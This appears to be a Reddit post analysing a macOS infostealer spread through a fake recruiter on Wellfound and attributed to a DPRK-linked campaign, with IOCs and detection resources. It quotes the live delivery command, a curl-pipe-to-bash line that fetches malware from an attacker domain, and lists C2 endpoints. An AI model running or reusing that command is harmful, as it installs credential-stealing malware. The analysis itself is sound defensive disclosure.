This article details a sophisticated macOS infostealer malware delivered via a social engineering campaign on Wellfound, where a fake recruiter lured targets to a malicious site triggering a `curl|bash` command. The Rust-compiled binary uses a custom cipher with 570 unique decryption functions to hide its configuration, which was reverse-engineered to expose C2 infrastructure (`cloudproxy.link`) and a Sentry DSN for attribution to DPRK's Contagious Interview cluster. The malware steals browser credentials, crypto wallets, and session data, with current detection rates low (9/72 on VirusTotal), and full IOCs and analysis are published on GitHub.
Last week I received what looked like a legitimate job opportunity on Wellfound. An operator persona named "Felix" at "HyperHive" ran a multi-email social engineering chain referencing my real CV and technical background, then directed me to "review the product" at hyperhives.net before a scheduled interview. Navigating to Settings → Diagnostics → Log triggered: curl -s https://macos.hyperhives.net/install | nohup bash & I did not enter my password into the fake dialog that appeared. I killed the processes, preserved the binary, and spent the next several hours reverse-engineering it in an air-gapped Docker lab. The binary: 8.5MB Mach-O universal (x86_64 + arm64), Rust-compiled, production-grade infostealer. Currently 9/72 on VirusTotal — Sophos, CrowdStrike, Malwarebytes, and most enterprise tools are missing it. The encryption problem: Every operationally significant string was encrypted using a custom cipher with 570 unique x86_64 helper functions. Each function computes a unique key offset via custom arithmetic (imul, rol, xor, shr, neg). I emulated all 570 functions using Unicorn CPU emulator and recovered all 571 encrypted configuration values in 1.1 seconds. What that exposed: C2: cloudproxy.link (4 endpoints: /m/opened, /m/metrics, /m/decode, /db/debug) Sentry DSN: 526eff9f8bb7aafd7117ca5e33a6a183@o4509139651198976.ingest.de.sentry.io/4509422649213008 — a legal subpoena to Sentry for org 4509139651198976 would yield the operator's registration email, payment records, and IP history Build identity: user rootr , codename force , version 9.12.1 276 Chrome extension IDs targeted: 188 crypto wallets, 3 password managers, Deloitte credential store What it steals: browser passwords, credit cards, cookies, login keychain, Apple Notes, Telegram session data, crypto wallet extensions. TTP alignment: Wellfound fake recruiter, multi-step trust building, curl|bash delivery, Rust macOS binary, fake password dialog, massive crypto wallet targeting — consistent with DPRK Contagious Interview / CL-STA-240. Disclosure timeline: Email received April 4. Analysis completed April 6. Reported to FBI IC3 April 6. Publishing April 7. Full repo with YARA rules, Sigma rules, STIX 2.1 bundle, ATT&CK Navigator layer, decryption scripts, and all IOCs: https://github.com/Darksp33d/hyperhives-macos-infostealer-analysis VirusTotal (9/72 detections): https://www.virustotal.com/gui/file/5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3/detection submitted by /u/SD483 [link] [comments]